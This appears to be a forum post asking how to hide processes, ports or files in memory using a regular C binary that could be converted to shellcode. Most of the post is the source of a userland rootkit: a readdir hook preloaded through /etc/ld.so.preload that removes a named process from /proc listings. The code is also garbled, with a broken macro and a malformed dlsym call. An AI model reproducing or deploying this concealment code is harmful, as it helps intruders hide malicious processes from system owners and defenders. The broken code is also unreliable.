Using dirent in a regular binary

I wanted to see if its possible to use dirent and readdir to hide a file in memory. I know it can be done using an LKM or shared object. I'm trying to just do it with a regular C binary. That way I could change that to shellcode easily and throw it into memory. I've got this code which works as a shared object one can hook with /etc/ld.so.preload:

#include <stdio.h>

#include <dlfcn.h>

#include <dirent.h>

#include <string.h>

#include <unistd.h>

​

/* Every process with this name will be excluded */

static const char* process_to_filter = "test";

​

/* Get a directory name given a DIR* handle */

static int get_dir_name(DIR* dirp, char* buf, size_t size) {

int fd = dirfd(dirp);

if(fd == -1) {

return 0;

}

​

char tmp[64];

snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);

ssize_t ret = readlink(tmp, buf, size);

if(ret == -1) {

return 0;

}

​

buf[ret] = 0;

return 1;

}

​

/* Get a process name given its pid */

static int get_process_name(char* pid, char* buf) {

if(strspn(pid, "0123456789") != strlen(pid)) {

return 0;

}

​

char tmp[275];

snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);

FILE* f = fopen(tmp, "r");

if(f == NULL) {

return 0;

}

​

if(fgets(tmp, sizeof(tmp), f) == NULL) {

fclose(f);

return 0;

}

​

fclose(f);

​

int unused;

sscanf(tmp, "%d (%[^)]s", &unused, buf);

return 1;

}

​

#define DECLARE_READDIR(dirent, readdir)

static struct dirent* (*original_readdir)(DIR*) = NULL;

struct dirent* readdir(DIR *dirp) {

if(original_readdir == NULL) {

original_readdir = dlsym(RTLD_NEXT, readdir);

if(original_readdir == NULL) {

fprintf(stderr, "Error in dlsym: %s\n", dlerror());

}

}

struct dirent* dir;

while(1) {

dir = original_readdir(dirp);

if(dir) {

char dir_name[256];

char process_name[256];

if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&

strcmp(dir_name, "/proc") == 0 &&

get_process_name(dir->d_name, process_name) &&

strcmp(process_name, process_to_filter) == 0) {

continue;

}

}

break;

}

return dir;

}

DECLARE_READDIR(dirent64, readdir64);

DECLARE_READDIR(dirent, readdir);

I don't know if this is even possible for hiding ports, pids, or files outside of an LKM or shared object. I've modified it to compile as a binary and have no errors or warnings with gcc -Wall -Wextra. I tried adding static too, but it doesn't seem to hide anything. Does anyone know how to do this? Or if I'm at a dead end?

submitted by /u/glued2thefloor
[link] [comments]

from hacking: security in practice https://ift.tt/6AOexks